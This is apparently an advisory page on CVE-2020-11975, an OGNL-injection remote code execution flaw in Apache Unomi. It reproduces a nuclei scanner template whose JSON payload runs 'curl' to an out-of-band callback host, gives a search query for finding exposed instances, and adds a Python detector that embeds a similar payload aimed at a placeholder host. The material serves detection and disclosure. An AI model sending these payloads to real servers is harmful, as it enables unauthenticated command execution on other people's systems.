Apache Unomi Remote Code Execution Vulnerability

Vulnerability Information

Vulnerability name: Apache Unomi Remote Code Execution Vulnerability

Vulnerability ID:

  • CVE: CVE-2020-11975

Vulnerability type: Command execution

Severity: Critical

Vulnerability description: Apache Unomi is an open-source Customer Data Platform (CDP) used to manage customer data and personalize customer experiences. It is widely used in enterprise services, helping organizations collect, unify and analyze customer data to deliver personalized user experiences. The platform supports multiple deployment scenarios, including cloud and on-premises, and is favored by many enterprises for its flexibility and rich functionality.

The vulnerability lies in Apache Unomi's condition feature, which allows the use of OGNL (Object-Graph Navigation Language) scripts. OGNL scripts offer the possibility to call static Java classes from the JDK, which can execute code with the permission level of the running Java process. An attacker can exploit this by constructing a malicious OGNL expression to achieve remote code execution (RCE). The technical root cause is that Apache Unomi did not apply proper input validation and security restrictions to user-supplied OGNL scripts, allowing an attacker to inject and execute arbitrary code.

An attacker who successfully exploits this vulnerability can execute arbitrary code on the server with the privileges of the Java process, potentially leading to complete system compromise. Because the vulnerability can be exploited without any form of authentication and can be triggered remotely, its potential security risk is extremely high. An attacker could use it for data exfiltration, service disruption or further intrusion into the system. Moreover, since the attack process can be automated, the bar for exploitation is relatively low, increasing the likelihood of in-the-wild exploitation.

Vendor: Apache

Product: Unomi

Search syntax: http.title:"Apache Unomi" || "Apache Unomi"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/acb7b2003df1ac107b2e6beb3f6beb9e8107375b/http%2Fcves%2F2020%2FCVE-2020-11975.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC Details


```yaml
id: CVE-2020-11975

info:
  name: Apache Unomi - Remote Code Execution
  author: Sourabh-Sahu
  severity: critical
  description: |
    Apache Unomi allows conditions to use OGNL scripting which offers the possibility to call static Java classes from the JDK that could execute code with the permission level of the running Java process, enabling attackers to execute arbitrary code.
  impact: |
    Successful exploitation allows an attacker to execute arbitrary code on the server with the privileges of the Java process, potentially leading to complete system compromise.
  remediation: |
    Update Apache Unomi to version 1.5.2 or later. Disable OGNL scripting in conditions if not required.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-11975
    - https://xz.aliyun.com/news/8157
    - https://github.com/1135/unomi_exploit
    - https://unomi.apache.org/security/cve-2020-11975.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-11975
    cwe-id: CWE-94
    epss-score: 0.97373
    epss-percentile: 0.99982
    cpe: cpe:2.3:a:apache:unomi:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: unomi
    shodan-query: 'http.title:"Apache Unomi" || "Apache Unomi"'
  tags: cve,cve2020,apache,unomi,rce,ognl,oast

http:
  - method: POST
    path:
      - "{{BaseURL}}/context.json"
    headers:
      Content-Type: application/json
    body: |
      {
        "personalizations":[
          {
            "id":"gender-test_anystr",
            "strategy":"matching-first",
            "strategyOptions":{
              "fallback":"var2"
            },
            "contents":[
              {
                "filters":[
                  {
                    "condition":{
                      "parameterValues":{
                        "propertyName":"(#r=@java.lang.Runtime@getRuntime()).(#r.exec(\"curl {{interactsh-url}}\"))",
                        "comparisonOperator":"equals_anystr",
                        "propertyValue":"male_anystr"
                      },
                      "type":"profilePropertyCondition"
                    }
                  }
                ]
              }
            ]
          }
        ],
        "sessionId":"test-demo-session-id"
      }

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"
        condition: or
```
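The template above injects its OGNL expression through the `propertyName` parameter of a `profilePropertyCondition` posted to `/context.json`. As an added detection example (not part of the original page or the nuclei template), the following Python walks such a request body, as a WAF or reverse proxy would see it, and flags any condition parameter value containing OGNL syntax; the two sample bodies and the callback host are constructed for the example.

```python
import json
import re
from typing import Any, Iterator
# OGNL constructs that never belong in a Unomi property name: static class
# references (@java.lang.Runtime@...), chained assignment ((#r=...)), exec calls.
OGNL_PATTERNS = [
    re.compile(r"@[\w.]+@"),                               # static member reference
    re.compile(r"\(\s*#\w+\s*="),                          # (#var=...) assignment
    re.compile(r"\.exec\s*\("),                            # Runtime.exec(...)
    re.compile(r"java\.lang\.(?:Runtime|ProcessBuilder)"),
]

def _conditions(node: Any) -> Iterator[dict]:
    """Yield every dict shaped like a Unomi condition (carrying a
    'parameterValues' mapping), however deeply it is nested in the body."""
    if isinstance(node, dict):
        if isinstance(node.get("parameterValues"), dict):
            yield node
        for value in node.values():
            yield from _conditions(value)
    elif isinstance(node, list):
        for item in node:
            yield from _conditions(item)

def find_ognl_injections(body: str) -> list[tuple[str, str]]:
    """Return (parameter, value) pairs from a /context.json request body whose
    string values contain OGNL syntax; [] for a benign or unparseable body."""
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return []
    return [(key, value)
            for cond in _conditions(data)
            for key, value in cond["parameterValues"].items()
            if isinstance(value, str) and any(p.search(value) for p in OGNL_PATTERNS)]

def _body(property_name: str) -> str:
    """Constructed sample body (not captured traffic) in the shape the template
    above sends; only propertyName differs between the two samples."""
    cond = {"type": "profilePropertyCondition",
            "parameterValues": {"propertyName": property_name,
                                "comparisonOperator": "equals",
                                "propertyValue": "male"}}
    return json.dumps({"personalizations": [{"id": "p1", "strategy": "matching-first",
                                             "contents": [{"filters": [{"condition": cond}]}]}],
                       "sessionId": "s1"})

# Mirrors the template's payload with a placeholder callback host (constructed).
MALICIOUS_BODY = _body('(#r=@java.lang.Runtime@getRuntime()).(#r.exec("curl http://callback.example"))')
BENIGN_BODY = _body("properties.gender")  # what a legitimate client would send
```

Because the walk is recursive, it also catches OGNL placed in nested or differently typed conditions, not only the exact layout the template uses.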

http://example.com/2025/07/23/github_3684130455/
Author
lianccc
Published on
July 23, 2025